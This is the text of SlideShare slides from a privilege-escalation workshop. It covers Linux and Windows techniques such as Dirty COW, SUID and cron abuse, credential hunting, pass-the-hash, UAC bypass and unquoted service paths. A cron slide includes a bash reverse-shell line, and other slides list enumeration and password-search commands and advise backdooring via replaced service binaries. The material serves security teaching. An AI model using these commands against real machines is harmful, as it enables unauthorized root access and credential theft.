SlideShare ist ein Scribd-Unternehmen logo

Privilege escalation from 1 to 0 Workshop

H
Hossam .M Hamed

HACKTRICK'18 Privilege escalation Workshop By Hossam Mohamed

Technologie
1 von 60
Downloaden Sie, um offline zu lesen
By : Hossam Mohamed Privilege Escalation From 1 To 0
By : Hossam Mohamed Privilege Escalation From 1 To 0 About ME • Hossam Mohamed • Egyptian , 18 Years Old • Working As cyber security analyst @ Boraq-Group • Working in Cyber Security for 2 years :) • PHP, Python Lover • GitHub , Twitter , LinkedIn @wazehell
Privilege Escalation From 1 To 0 Understanding Privilege Escalation components Linux Privilege Escalation Windows Privilege Escalation Some Demo's What Will Be Covered ? By : Hossam Mohamed
Privilege Escalation From 1 To 0 By : Hossam Mohamed Why I need Privilege Escalation ? • Why Everyone Want to get high ? • Limited Access Or Full Compromised Machine ? • Opportunity to more maintain access • More Control Teg : hacktrick_pef10 For Who
Privilege Escalation From 1 To 0 By : Hossam Mohamed Privilege Escalation Types Horizontal Privilege Escalation Vertical Privilege Escalation Horizontal normal user accesses functions or content related for other users Vertical also known as privilege elevation lower privilege user>higher privilege user
Privilege Escalation From 1 To 0 By : Hossam Mohamed vertical privilegeescalation is what will talk about Lower privilege user Higher privilege user
Privilege Escalation From 1 To 0 By : Hossam Mohamed vertical privilegeescalation is what will talk about Lower privilege user Higher privilege user System Root Sudo Users - Services Users Adminisrators P Users Users - Services Users
Privilege Escalation From 1 To 0 By : Hossam Mohamed vertical privilegeescalation is what will talk about Lower privilege user Higher privilege user Windows • Known exploits • vulnerable windows services • misconfigurations Linux • Kernel Exploit • Known Exploits • Exploiting Services • Exploiting Sudo Users • misconfigurations
Privilege Escalation From 1 To 0 By : Hossam Mohamed Let's Talk A little bit about Kernel • A kernel is the core component of any operating system • Low level task (disk management , memory management) • Memory management and I/O • Link Between Hardware (I/O) , Apps , CPU and Memory . • Device management through the use of device drivers kernel is responsible !
Privilege Escalation From 1 To 0 By : Hossam Mohamed We Don't Need to know too much about kernel at this moment
Privilege Escalation From 1 To 0 By : Hossam Mohamed MES Misconfiguration Exploit Vulnerable Service
Privilege Escalation From 1 To 0 By : Hossam Mohamed MES Misconfiguration Exploit Vulnerable Service • VulnerableMachine • Exploit ! • Ability To Move Exploit • Ability To Compile and Run • SUID • Sudo Users • Weak file's Permissions • And many more • We will talk about that a lot
Privilege Escalation From 1 To 0 By : Hossam Mohamed start with Linux • Kernel Exploitation • Weak password of high privilegeusers • file with weak permission • Configurations, Logs files • History • Env , $PATH • Shell Escape • VulnerableApp / Service • Weak permissionof Jobs/Task • Sudoer • System Misconfiguration
Privilege Escalation From 1 To 0 By : Hossam Mohamed Kernel Exploits • Kernel Exploits • Find Stable One Or die() • MCE (Move – compile – Execute) • Problems with Kernel Expliots • Dirty Cow :)
Privilege Escalation From 1 To 0 By : Hossam Mohamed Dirty Cow • October 2016 • W Access to Memory Mappings • Inject Or In other word write code into privileged files • Flaw in kernel’s memory subsystem which handles the copy-on-write
Privilege Escalation From 1 To 0 By : Hossam Mohamed It's Not A Cow • copy-on-write (COW) ! • W Access to Memory Mappings • Inject Or In other word write code into privileged files • Flaw in kernel’s memory subsystem which handles the copy-on-write • Demo
Privilege Escalation From 1 To 0 By : Hossam Mohamed Password Attacks # Passwords Every where Check users without passwords .. maybe you got more privilege ! Check For credentials Are you sudo ! , check etc/shadow John the Ripper are here Password mining (configs – logs – bash_history) Password Policy Weakness
Privilege Escalation From 1 To 0 By : Hossam Mohamed Password Attacks Understanding /etc/passwd 1 => username ! 2 => password 3 => UID 4 => GID 5 => UserInfo 6 => Home Dir 7 => Shell All passwords in /etc/shadow
Privilege Escalation From 1 To 0 By : Hossam Mohamed Password Attacks Log , History Cat ~/.bash_history | grep –text "ssh" Or whatever you can pass the password via command line Maybe Web cms configs ! Admin notes Keys And many more !
Privilege Escalation From 1 To 0 By : Hossam Mohamed Escape to shell Restricted Shells Its limiting user's ability and only allows them to perform a subset of system commands # so how to kill ! # Development environment (python , perl , ruby , go , php .. etc) # Redirecting output using redirection operators like >, >>, >|,&> # Using the 'exec' built like "find . -exec "/bin/bash" ;" # unsetting certain environment variables #Specifying filenames or command names that contain slashes. Restricted Shell
Privilege Escalation From 1 To 0 By : Hossam Mohamed Escape to shell Restricted Shells Its limiting user's ability and only allows them to perform a subset of system commands # so how to kill ! # Development environment (python , perl , ruby , go , php .. etc) # Redirecting output using redirection operators like >, >>, >|,&> # Using the 'exec' built like "find . -exec "/bin/bash" ;" # unsetting certain environment variables #Specifying filenames or command names that contain slashes. Restricted Shell
Privilege Escalation From 1 To 0 By : Hossam Mohamed Cron Jobs .. Time Game :) # What is Cron Jobs Cron jobs, if not configured properly can be exploited to get root privilege. # script or binaries in cron jobs to be writable # Is cron.d directory writable # Can we write over the cron file itself. ls -la /etc/cron.d find /etc/cron* -perm - 0002 -type f -exec ls -la {} ; -exec cat {} 2>/dev/null ; bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
Privilege Escalation From 1 To 0 By : Hossam Mohamed Sudo • Super User Pls Do It ! • Run With Others • Cat /etc/sudoers • What Sudoers Can do 1
Privilege Escalation From 1 To 0 By : Hossam Mohamed # File Permissions • Check Files . • Edit And Run :) • More ! R = read => 4 W = write => 2 X = execute =>1
Privilege Escalation From 1 To 0 By : Hossam Mohamed # SUID Files Allows you to run programs as another user upon execution Or in other word (with root) Local Exploits or BoF in SUID app will make you run as root SUID Files find / -user root - perm -4000 -print 2>/dev/null find / -perm -u=s - type f 2>/dev/null find / -user root - perm -4000 -exec ls - ldb {} ;
Privilege Escalation From 1 To 0 By : Hossam Mohamed SUID Files find / -user root - perm -4000 -print 2>/dev/null find / -perm -u=s - type f 2>/dev/null find / -user root - perm -4000 -exec ls - ldb {} ;
Privilege Escalation From 1 To 0 By : Hossam Mohamed Environment Variables # Dynamic linker # What's Dynamic linker Dot In PATH !
Privilege Escalation From 1 To 0 By : Hossam Mohamed misconfigurations Webserver => Configs => credential's What if we got MySQL credential's Known Services Exploits modern Linux distributions security ps -ef | grep root
Privilege Escalation From 1 To 0 By : Hossam Mohamed Exercise
Privilege Escalation From 1 To 0 By : Hossam Mohamed Day 2
Privilege Escalation From 1 To 0 By : Hossam Mohamed Windows Access Control Only "NTFS" formatted drive Cacls output • F (full access), M (modify access), RX (read and execute access) • R (read-only access) ,W (write-only access) # • (OI): object inherit, (CI): container inherit • (IO): inherit only, (NP): do not propagate inherit • (I): permissioninherited from parent container
Privilege Escalation From 1 To 0 By : Hossam Mohamed Windows integrity levels (IL) Untrusted Low Medium High System Protected/Installer Check your user if local admin !!
Privilege Escalation From 1 To 0 By : Hossam Mohamed Windows Files Premonitions Overwrite is always big plus Identify writeable files Recently Created Directories default permissions i/cacls utility Accesschk tool Write Read & Execute Read Full
Privilege Escalation From 1 To 0 By : Hossam Mohamed From Local Admin To Domain Admin Pass The Hash Hashdump RDP, Add new Domain Admin Have Some Fun IT Admin Box Local Box Domain Box
Privilege Escalation From 1 To 0 By : Hossam Mohamed Stealing NTLM From Web !! Automatic Logon Policy (Win HTTP) https://github.com/blazeinfosec/ssrf-ntlm/ MySQL LOAD DATA INFILE qprocess /server:15.15.45.41 Nltest Outlook CVE-2018-0950
Privilege Escalation From 1 To 0 By : Hossam Mohamed Stealing NTLM Outlook CVE-2018-0950
Privilege Escalation From 1 To 0 By : Hossam Mohamed User Account Control (UAC) • security feature of Windows isn't ! :) • Not a Security Boundary • prevent unauthorized changes to the operating system (Run App ..etc) • So UAC Is Issue For a pen tester !! UAC Bypass 1. COM Handler Hijack 2. Memory Injection 3. Some Registry Keys like (FodHelper - Eventvwr)
Privilege Escalation From 1 To 0 By : Hossam Mohamed Credentials Credentials are everywhere . Configs - Backups Admin notes – Plaintext Passwords Encrypted Credentials Cashed Credentials (ftp – vnc .. Etc) Post/windows/gather/credentials/* grep => findstr c:sysprep.inf c:sysprep c:sysprep.xml c:Unattended.xml
Privilege Escalation From 1 To 0 By : Hossam Mohamed Credentials Passwords in registry’s Putty – snmp reg query HKLM /f password /t REG_SZ /s
Privilege Escalation From 1 To 0 By : Hossam Mohamed Credentials Have Groups.xml ! dir /s *pass* == *cred* == *vnc* == *.config* findstr /si password *.xml *.ini *.txt Password In Paper !
Privilege Escalation From 1 To 0 By : Hossam Mohamed Users Information Local Administrators Check net localgroup administrators Domain user listing Get-ADUser -Filter * -SearchBase "dc=domain,dc=local" | select Name,SID
Privilege Escalation From 1 To 0 By : Hossam Mohamed Users Information UserListing Net users Sessions qwinsta
Privilege Escalation From 1 To 0 By : Hossam Mohamed Massing patches Kernel Exploits Discovery of Missing Patches wmic qfe get Caption,Description,HotFixID,InstalledOn Or kill AV post/windows/gather/enum_patches
Privilege Escalation From 1 To 0 By : Hossam Mohamed Applications Local Exploit Our friend exploit-db Maybe it’s not about Privilege escalation exploits only RCE system privilege!! You maybe have other way ! post/multi/recon/local_exploit_suggester
Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation As we see , windows privilege escalation exploitation tecnics will start from here ☺ Quick look at exploit db More then 60% of windows privilege escalation exploitation about services! It’s sound like ohh I thin that’s easy Good to have powershell knowledge Let’s get involved!!
Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Identify running services. Net config / services under your control Say hello to your new friend “sc” What’s sc ? Sc query /list all of the services on the machine post/windows/gather/enum_services
Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Let’s start analysis what we got ! Local administrator or services account! Local System - Network Service - Local Service Do you really want to get other limited shell ? Just Get Hash’s and go home to crack and come back Get-ADDefaultDomainPasswordPolicy / I thin you will know how much time it will take to crack it !!
Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Normal Service Exploitation some checks Services are automatically starting? Services are controlled? Can you overwrite Service binary? Congratulations you own the box Note : “in modern os sometimes, when you replace services binary with metasploit payload you will lose the shell after 1 min that’s bcs the app crash , so make sure that your payload is about simple task ! “ like install backdoor or add user
Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Want some CVE into your CV ? I will tell you a trick :”) “Unquoted services paths” or trusted paths What’s that ? It’s about space and “ C:Program Filesblabla appstart.exe C:Program*Filesblabla*appstart.exe All of the * are vulnerable points If you failed in A plan , there are other 25 alphabet to try with it :”)
Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Identify Unquoted services wmic service get name,displayname,pathname,startmode |findstr /i “auto” |findstr /i /v “c:windows” |findstr /i /v “”” Identify services account level !! Check Write access ! Icacls /Service path/ Check control Net config | findstr services name Or if it’s automatically start , check if you can restart the box exploit/windows/local/trusted_service_path
Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Registry Permissions It’s not common “Adminisrators only who have write prem by default “ But ! It’s easy to exploit Services listing in regedit HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservi ces Take look and check if you can change the path ! Good luck! If you are in windows box GUI access is just a option It’s depends on you !
Privilege Escalation From 1 To 0 By : Hossam Mohamed Named pipes exploitation What’s Pipes ?! IO ninja Pipeslist check your pipes Metasploit : getsystem Fuzzing demo
Privilege Escalation From 1 To 0 By : Hossam Mohamed DLL Injection Windowscan dynamicallyload DLLs What if DLL is Missing ? LoadLibrary(“iamalib.dll”) LoadLibrary(“c:program filesiamalib.dll”)
Privilege Escalation From 1 To 0 By : Hossam Mohamed DLL Injection Not found ? Windowsattempts to locate the DLL by searching a well-defined set of directories "DLL preloading attack or a binary planting attack" How the searching operate work ? HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControl Session ManagerKnownDLLs
Privilege Escalation From 1 To 0 By : Hossam Mohamed More Exploits CVE-2018-1038 Total Meltdown Windows 7 & 2008 R2 Some Kernel Exploits Windows 10 https://blog.xpnsec.com/total-meltdown-cve-2018-1038/ Also There are a good book for kernel exploitation "A Guide to Kernel Exploitation: Attacking the Core"
Privilege Escalation From 1 To 0 By : Hossam Mohamed AutoRun AutoRuns tool Check Paths Can You Overwrite ? Restart Got SYSTEM Account :")
Privilege Escalation From 1 To 0 By : Hossam Mohamed Binary Replacements Check Imported Binary C:WindowsSystem32sethc.exe Registers Check • RunAs • RunOnce • RenameOnReboot • AlwaysInstallElevated • SRP Policy Enumeration
Privilege Escalation From 1 To 0 By : Hossam Mohamed Other Checks • Virtual Image Backups / Storage VMDK - VHD / VHDX - OVA - ISO – IMG • Source code of applications running • Default passwords for installed applications • Default configuration file locations What's Stored on Network Shares ? Task manager
Privilege Escalation From 1 To 0 By : Hossam Mohamed I Think This the end :") Nice To Meet You All !! @wazehell
Privilege Escalation From 1 To 0 By : Hossam Mohamed

Empfohlen

Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahOWASP Delhi
 
Linux privilege escalation
Linux privilege escalationLinux privilege escalation
Linux privilege escalationSongchaiDuangpan
 
Linux privilege escalation 101
Linux privilege escalation 101Linux privilege escalation 101
Linux privilege escalation 101Rashid feroz
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesMaxime ALAY-EDDINE
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 

Empfohlen

Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahOWASP Delhi
 
Linux privilege escalation
Linux privilege escalationLinux privilege escalation
Linux privilege escalationSongchaiDuangpan
 
Linux privilege escalation 101
Linux privilege escalation 101Linux privilege escalation 101
Linux privilege escalation 101Rashid feroz
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesMaxime ALAY-EDDINE
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practicesMohammed Danish Amber
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
OWASP Top Ten
OWASP Top TenOWASP Top Ten
OWASP Top TenChristian Heinrich
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Edureka!
 
Ceh v5 module 14 sql injection
Ceh v5 module 14 sql injectionCeh v5 module 14 sql injection
Ceh v5 module 14 sql injectionVi Tính Hoàng Nam
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Frameworkn|u - The Open Security Community
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingNezar Alazzabi
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Codingbilcorry
 
Secure Code Review 101
Secure Code Review 101Secure Code Review 101
Secure Code Review 101Narudom Roongsiriwong, CISSP
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing Netpluz Asia Pte Ltd
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityEryk Budi Pratama
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2Scott Sutherland
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3Shawn Croswell
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Endpoint Security Pres.pptx
Endpoint Security Pres.pptxEndpoint Security Pres.pptx
Endpoint Security Pres.pptxNBBNOC
 
Linux privesc.pptx
Linux privesc.pptxLinux privesc.pptx
Linux privesc.pptxSouvikRoy114738
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat Security Conference
 

Weitere ähnliche Inhalte

Was ist angesagt?

Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Edureka!
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingNezar Alazzabi
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Codingbilcorry
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing Netpluz Asia Pte Ltd
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityEryk Budi Pratama
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2Scott Sutherland
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3Shawn Croswell
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Endpoint Security Pres.pptx
Endpoint Security Pres.pptxEndpoint Security Pres.pptx
Endpoint Security Pres.pptxNBBNOC
 

Was ist angesagt? (20)

Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
 
Web application security
Web application securityWeb application security
Web application security
 
OWASP Top Ten
OWASP Top TenOWASP Top Ten
OWASP Top Ten
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...
 
Ceh v5 module 14 sql injection
Ceh v5 module 14 sql injectionCeh v5 module 14 sql injection
Ceh v5 module 14 sql injection
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Coding
 
Secure Code Review 101
Secure Code Review 101Secure Code Review 101
Secure Code Review 101
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application Security
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Endpoint Security Pres.pptx
Endpoint Security Pres.pptxEndpoint Security Pres.pptx
Endpoint Security Pres.pptx
 

Ähnlich wie Privilege escalation from 1 to 0 Workshop

BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat Security Conference
 
Utilizing the Xen Hypervisor in business practice - Bryan Fusilier
Utilizing the Xen Hypervisor in business practice - Bryan FusilierUtilizing the Xen Hypervisor in business practice - Bryan Fusilier
Utilizing the Xen Hypervisor in business practice - Bryan FusilierMatthew Turland
 
The Complete CTF Road Map
The Complete CTF Road Map The Complete CTF Road Map
The Complete CTF Road Map HusseinMuhaisen
 
Windows Privilege Escalation
Windows Privilege EscalationWindows Privilege Escalation
Windows Privilege EscalationRiyaz Walikar
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfRohitGautam261127
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPRISMA CSI
 
Windows Malware Techniques
Windows Malware TechniquesWindows Malware Techniques
Windows Malware TechniquesLee C
 
Presentation nix
Presentation nixPresentation nix
Presentation nixfangjiafu
 
Presentation nix
Presentation nixPresentation nix
Presentation nixfangjiafu
 
Check Your Privilege (Escalation)
Check Your Privilege (Escalation) Check Your Privilege (Escalation)
Check Your Privilege (Escalation) Bishop Fox
 
Understanding salt modular sub-systems and customization
Understanding salt modular sub-systems and customizationUnderstanding salt modular sub-systems and customization
Understanding salt modular sub-systems and customizationjasondenning
 
Mayhem malware
Mayhem malwareMayhem malware
Mayhem malwareAkash Deep
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access darkRoyce Davis
 
Introduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation MethodsIntroduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation MethodsBishop Fox
 
Your Inner Sysadmin - MidwestPHP 2015
Your Inner Sysadmin - MidwestPHP 2015Your Inner Sysadmin - MidwestPHP 2015
Your Inner Sysadmin - MidwestPHP 2015Chris Tankersley
 

Ähnlich wie Privilege escalation from 1 to 0 Workshop (20)

Linux privesc.pptx
Linux privesc.pptxLinux privesc.pptx
Linux privesc.pptx
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 
Utilizing the Xen Hypervisor in business practice - Bryan Fusilier
Utilizing the Xen Hypervisor in business practice - Bryan FusilierUtilizing the Xen Hypervisor in business practice - Bryan Fusilier
Utilizing the Xen Hypervisor in business practice - Bryan Fusilier
 
The Complete CTF Road Map
The Complete CTF Road Map The Complete CTF Road Map
The Complete CTF Road Map
 
Windows Privilege Escalation
Windows Privilege EscalationWindows Privilege Escalation
Windows Privilege Escalation
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
 
Windows Malware Techniques
Windows Malware TechniquesWindows Malware Techniques
Windows Malware Techniques
 
Presentation nix
Presentation nixPresentation nix
Presentation nix
 
Presentation nix
Presentation nixPresentation nix
Presentation nix
 
Gwc3
Gwc3Gwc3
Gwc3
 
Check Your Privilege (Escalation)
Check Your Privilege (Escalation) Check Your Privilege (Escalation)
Check Your Privilege (Escalation)
 
Understanding salt modular sub-systems and customization
Understanding salt modular sub-systems and customizationUnderstanding salt modular sub-systems and customization
Understanding salt modular sub-systems and customization
 
Mayhem malware
Mayhem malwareMayhem malware
Mayhem malware
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is Hacked
 
How to build an admin guy
How to build an admin guyHow to build an admin guy
How to build an admin guy
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access dark
 
Introduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation MethodsIntroduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation Methods
 
Your Inner Sysadmin - MidwestPHP 2015
Your Inner Sysadmin - MidwestPHP 2015Your Inner Sysadmin - MidwestPHP 2015
Your Inner Sysadmin - MidwestPHP 2015
 

Kürzlich hochgeladen

Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
